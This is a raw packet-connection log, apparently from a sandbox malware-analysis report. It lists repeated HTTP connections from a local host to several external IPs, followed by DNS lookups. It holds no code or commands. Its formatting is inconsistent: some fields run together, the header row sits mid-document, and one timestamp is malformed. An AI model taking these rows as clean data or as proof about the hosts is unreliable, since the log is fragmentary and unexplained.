May 16, 2024 17:19:26.005453110 CEST | 49721 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:27.017941952 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:27.023000956 CEST | 80 | 49722 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:27.023128986 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:27.047625065 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:27.075915098 CEST | 80 | 49722 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:29.256321907 CEST | 80 | 49722 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:29.310789108 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:29.562824965 CEST | 80 | 49722 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:29.562972069 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:29.569169998 CEST | 49722 | 80 | 192.168.2.9 | 57.151.38.169
May 16, 2024 17:19:29.574296951 CEST | 80 | 49722 | 57.151.38.169 | 192.168.2.9
May 16, 2024 17:19:34.582067013 CEST | 49723 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:34.588835955 CEST | 80 | 49723 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:34.588938951 CEST | 49723 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:34.590842962 CEST | 49723 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:34.644843102 CEST | 80 | 49723 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:35.267997980 CEST | 80 | 49723 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:35.274241924 CEST | 80 | 49723 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:35.274334908 CEST | 49723 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:36.092104912 CEST | 49723 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:37.110362053 CEST | 49724 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:37.115406036 CEST | 80 | 49724 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:37.115516901 CEST | 49724 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:37.117289066 CEST | 49724 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:37.167917013 CEST | 80 | 49724 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:38.623622894 CEST | 49724 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:38.628971100 CEST | 80 | 49724 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:38.629070044 CEST | 49724 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:39.648003101 CEST | 49725 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:39.652972937 CEST | 80 | 49725 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:39.653114080 CEST | 49725 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:39.655404091 CEST | 49725 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:39.660303116 CEST | 80 | 49725 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:39.712876081 CEST | 80 | 49725 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:40.897634983 CEST | 80 | 49725 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:40.951421022 CEST | 49725 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:41.170176983 CEST | 49725 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:42.188783884 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:42.201668024 CEST | 80 | 49726 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:42.201762915 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:42.203634977 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:42.251948118 CEST | 80 | 49726 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:43.052234888 CEST | 80 | 49726 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:43.107605934 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:43.354980946 CEST | 80 | 49726 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:43.355142117 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:43.356067896 CEST | 49726 | 80 | 192.168.2.9 | 162.241.216.140
May 16, 2024 17:19:43.365406036 CEST | 80 | 49726 | 162.241.216.140 | 192.168.2.9
May 16, 2024 17:19:48.462255955 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:48.467331886 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:48.467427969 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:48.469305038 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17: 19:48.524044037 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:49.188283920 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:49.194152117 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:49.194257021 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:49.203298092 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:49.248214006 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:49.596793890 CEST | 80 | 49727 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:49.596872091 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:50.412527084 CEST | 49727 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:51.424556017 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:51.429676056 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:51.429749966 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:51.432033062 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:51.483916998 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.113498926 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.118772984 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.118868113 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:52.132638931 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.188060999 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.188090086 CEST | 80 | 49728 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:52.188169003 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:52.935866117 CEST | 49728 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:53.954507113 CEST | 49729 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:53.959471941 CEST | 80 | 49729 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:53.962147951 CEST | 49729 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:53.965930939 CEST | 49729 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:53.971760035 CEST | 80 | 49729 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:54.017270088 CEST | 80 | 49729 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:55.467086077 CEST | 49729 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:55.515187979 CEST | 80 | 49729 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:56.269515038 CEST | 80 | 49729 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:56.270112038 CEST | 49729 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:56.485933065 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:56.491080999 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:56.492202044 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:56.497937918 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:56.543973923 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.187951088 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.190057039 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.190145016 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:57.194837093 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.199682951 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.199698925 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:19:57.199845076 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:57.199857950 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:57.202431917 CEST | 49730 | 80 | 192.168.2.9 | 217.160.0.111
May 16, 2024 17:19:57.210866928 CEST | 80 | 49730 | 217.160.0.111 | 192.168.2.9
May 16, 2024 17:20:03.040365934 CEST | 49731 | 80 | 192.168.2.9 | 91.195.240.123
                                                    May 16, 2024 17:20:03.046504021 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:03.046612024 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:03.048419952 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:03.104073048 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:04.560791969 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:04.566714048 CEST804973191.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:04.566812038 CEST4973180192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.580542088 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.585521936 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:05.585597038 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.587965965 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:05.636416912 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:07.092062950 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:07.097603083 CEST804973291.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:07.097702026 CEST4973280192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.117937088 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.122992992 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:08.123151064 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.125835896 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:08.130723000 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:08.180879116 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:09.638972044 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:09.644553900 CEST804973391.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:09.644615889 CEST4973380192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.657918930 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.663022995 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:10.666063070 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.669912100 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:10.716489077 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:20.951997042 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:20.952133894 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:20.953697920 CEST4973480192.168.2.991.195.240.123
                                                    May 16, 2024 17:20:20.961786032 CEST804973491.195.240.123192.168.2.9
                                                    May 16, 2024 17:20:26.151983023 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.159240961 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:26.159312010 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.161324024 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:26.216933966 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:27.671992064 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:27.677457094 CEST8049735162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:27.680314064 CEST4973580192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.689534903 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.694514990 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:28.694590092 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.696790934 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:28.751858950 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:30.030138969 CEST8049736162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:30.076365948 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:30.201611042 CEST4973680192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.220105886 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.227965117 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:31.229998112 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.231916904 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:31.236784935 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:31.288918972 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.106977940 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.111676931 CEST8049737162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:32.111726999 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:32.749934912 CEST4973780192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.768908024 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.773974895 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:33.774056911 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.776360035 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:33.827877998 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.576129913 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.580806017 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:20:34.580888987 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:34.581933022 CEST4973880192.168.2.9162.0.237.22
                                                    May 16, 2024 17:20:34.631911993 CEST8049738162.0.237.22192.168.2.9
                                                    May 16, 2024 17:21:04.293111086 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.298228025 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:04.298343897 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.300153971 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:04.351963043 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.327138901 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.373919010 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:05.628823996 CEST8049739103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:05.628889084 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:05.810842037 CEST4973980192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.829600096 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.834656000 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:06.834960938 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.836740017 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:06.887859106 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.658236027 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.701389074 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:07.969113111 CEST8049740103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:07.969188929 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:08.342179060 CEST4974080192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.361937046 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.367019892 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:09.367150068 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.369940042 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:09.374948025 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:09.420994043 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.088704109 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.093367100 CEST8049741103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:10.093518972 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:11.935194016 CEST4974180192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.939106941 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.944066048 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:12.950026035 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:12.951994896 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:13.000013113 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:14.693639040 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:14.795161009 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.003943920 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:15.004050970 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.005039930 CEST4974280192.168.2.9103.168.172.37
                                                    May 16, 2024 17:21:15.013782978 CEST8049742103.168.172.37192.168.2.9
                                                    May 16, 2024 17:21:20.099391937 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.104355097 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.104557991 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.106504917 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:20.155953884 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.928128958 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:20.974327087 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:21.241189003 CEST8049743104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:21.241235971 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:21.607727051 CEST4974380192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.626288891 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.631252050 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:22.631395102 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.633918047 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:22.683861017 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.629556894 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.670124054 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:23.929546118 CEST8049744104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:23.933932066 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:24.141936064 CEST4974480192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.159159899 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.164221048 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:25.164299965 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.166233063 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:25.171094894 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:25.216960907 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:26.427087069 CEST8049745104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:26.485933065 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:26.673924923 CEST4974580192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.707386971 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.712357044 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:27.712451935 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.714375973 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:27.764030933 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:28.717398882 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:28.765922070 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:29.023097992 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:29.023241043 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:30.024355888 CEST4974680192.168.2.9104.37.39.71
                                                    May 16, 2024 17:21:30.029318094 CEST8049746104.37.39.71192.168.2.9
                                                    May 16, 2024 17:21:43.315769911 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.320717096 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.320795059 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.322536945 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:43.372037888 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.887382984 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.892095089 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:43.894006968 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:44.279480934 CEST8049747199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:44.281985044 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:44.826555014 CEST4974780192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.844741106 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.849765062 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:45.849837065 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.851510048 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:45.908061981 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.529448032 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.534107924 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.541924000 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:46.935399055 CEST8049748199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:46.935600996 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:47.733298063 CEST4974880192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.752171993 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.757298946 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:48.757368088 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.759565115 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:48.764508963 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:48.812916994 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.398210049 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.402992010 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.403009892 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.403129101 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:49.782943964 CEST8049749199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:49.783111095 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:50.264045000 CEST4974980192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.269925117 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.274900913 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:51.275023937 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.276734114 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:51.327846050 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.385963917 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.390695095 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.390800953 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.761162043 CEST8049750199.59.243.225192.168.2.9
                                                    May 16, 2024 17:21:52.761378050 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.762284040 CEST4975080192.168.2.9199.59.243.225
                                                    May 16, 2024 17:21:52.771821976 CEST8049750199.59.243.225192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 16, 2024 17:18:46.281903028 CEST | 59842 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:18:46.318281889 CEST | 53 | 59842 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:19:03.737169027 CEST | 49492 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:19:03.759160042 CEST | 53 | 49492 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:19:19.260643005 CEST | 62268 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:19:19.350558996 CEST | 53 | 62268 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:19:48.417943001 CEST | 51193 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:19:48.459769011 CEST | 53 | 51193 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:20:02.230272055 CEST | 63045 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:20:03.037931919 CEST | 53 | 63045 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:20:25.971894026 CEST | 49996 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:20:26.148905993 CEST | 53 | 49996 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:20:39.596889973 CEST | 50382 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:20:39.629744053 CEST | 53 | 50382 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:20:47.689915895 CEST | 62424 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:20:47.707596064 CEST | 53 | 62424 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:20:55.767719984 CEST | 50742 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:20:55.798949957 CEST | 53 | 50742 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:21:03.863369942 CEST | 59089 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:21:04.290478945 CEST | 53 | 59089 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:21:20.027964115 CEST | 57602 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:21:20.094080925 CEST | 53 | 57602 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:21:35.033628941 CEST | 61937 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:21:35.046552896 CEST | 53 | 61937 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:21:43.112194061 CEST | 59200 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:21:43.313507080 CEST | 53 | 59200 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:21:57.769927025 CEST | 58153 | 53 | 192.168.2.9 | 1.1.1.1
May 16, 2024 17:21:57.805222988 CEST | 53 | 58153 | 1.1.1.1 | 192.168.2.9
May 16, 2024 17:22:05.861922979 CEST | 58742 | 53 | 192.168.2.9 | 1.1.1.1
